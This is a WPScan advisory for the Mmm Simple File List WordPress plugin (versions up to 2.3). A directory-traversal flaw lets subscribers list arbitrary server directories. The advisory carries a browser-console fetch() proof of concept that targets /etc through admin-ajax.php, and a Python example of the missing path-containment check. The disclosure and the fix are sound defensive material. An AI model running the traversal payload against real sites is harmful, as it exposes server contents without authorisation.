wpvulndb / Dmitrii / WPVDB-ID: 9FF85B06-819C-459E-90A9-6151BFD70978
History: Nov 06, 2023 - 12:00 a.m.

Mmm Simple File List <= 2.3 - Subscriber+ Arbitrary Directory Listing

2023-11-06 00:00:00
Dmitrii
wpscan.com
Tags: plugin vulnerability, directory listing, arbitrary access

AI Score: 6 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.2%)

Description

The plugin does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

    fetch("/wp-admin/admin-ajax.php", {
      "headers": { "content-type": "application/x-www-form-urlencoded" },
      "method": "POST",
      "body": 'action=parse-media-shortcode&shortcode=[MMFileList folder="../../../../../../../../../../etc" format="table" types="" headings=""]',
      "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));
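The missing step the description points at is a containment check on the path built from the shortcode's folder attribute. The following is an added illustration written for this entry, not the plugin's own code (the plugin is PHP; Python is used here so the check can be run stand-alone), and the function names, the constructed temporary upload tree and the "private" directory standing in for /etc are all assumptions. It canonicalises both the base directory and the requested path with realpath, so ".." segments and symlinks are resolved before comparing, and lists a constructed tree once with that check and once with the unvalidated join pattern the advisory describes:

```python
import os
import tempfile
from typing import Dict, List, Optional


def resolve_listing_path(base_dir: str, requested: str) -> Optional[str]:
    """Resolve `requested` (e.g. a shortcode 'folder' attribute) under base_dir.

    Returns the canonical absolute path if it stays inside base_dir, otherwise
    None. Both sides go through realpath first, so '..' segments and symlinks
    are resolved before the containment check. (Hypothetical helper, not the
    plugin's code.)
    """
    base = os.path.realpath(base_dir)
    # os.path.join discards base when `requested` is absolute, which is fine:
    # the containment check below rejects that case too.
    candidate = os.path.realpath(os.path.join(base, requested))
    # Inside base exactly when the longest shared prefix path is base itself.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def list_folder(base_dir: str, requested: str) -> List[str]:
    """Directory listing confined to base_dir; empty list when rejected."""
    target = resolve_listing_path(base_dir, requested)
    if target is None or not os.path.isdir(target):
        return []
    return sorted(os.listdir(target))


def unsafe_list_folder(base_dir: str, requested: str) -> List[str]:
    """The pattern the advisory describes: path built and used unvalidated."""
    target = os.path.join(base_dir, requested)
    return sorted(os.listdir(target)) if os.path.isdir(target) else []


def demo() -> Dict[str, List[str]]:
    """Build a constructed upload tree in a temp dir and compare both listers."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "uploads")
        os.makedirs(os.path.join(base, "docs"))
        open(os.path.join(base, "docs", "report.pdf"), "w").close()
        # Constructed directory outside the allowed tree, standing in for /etc.
        outside = os.path.join(root, "private")
        os.makedirs(outside)
        open(os.path.join(outside, "secret.txt"), "w").close()
        # A symlink inside the tree that points outside it; realpath unmasks it.
        try:
            os.symlink(outside, os.path.join(base, "link"))
            symlink_ok = True
        except OSError:
            symlink_ok = False
        return {
            "safe_docs": list_folder(base, "docs"),
            "safe_traversal": list_folder(base, "../private"),
            "unsafe_traversal": unsafe_list_folder(base, "../private"),
            "safe_absolute": list_folder(base, outside),
            "safe_symlink": list_folder(base, "link") if symlink_ok else [],
        }


if __name__ == "__main__":
    for name, names in demo().items():
        print(f"{name}: {names}")
```

Comparing strings before canonicalisation is not enough: a check such as "does the path start with the base directory" passes `uploads/../private` and a symlink into another tree, which is why both sides are passed through realpath before commonpath is applied.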
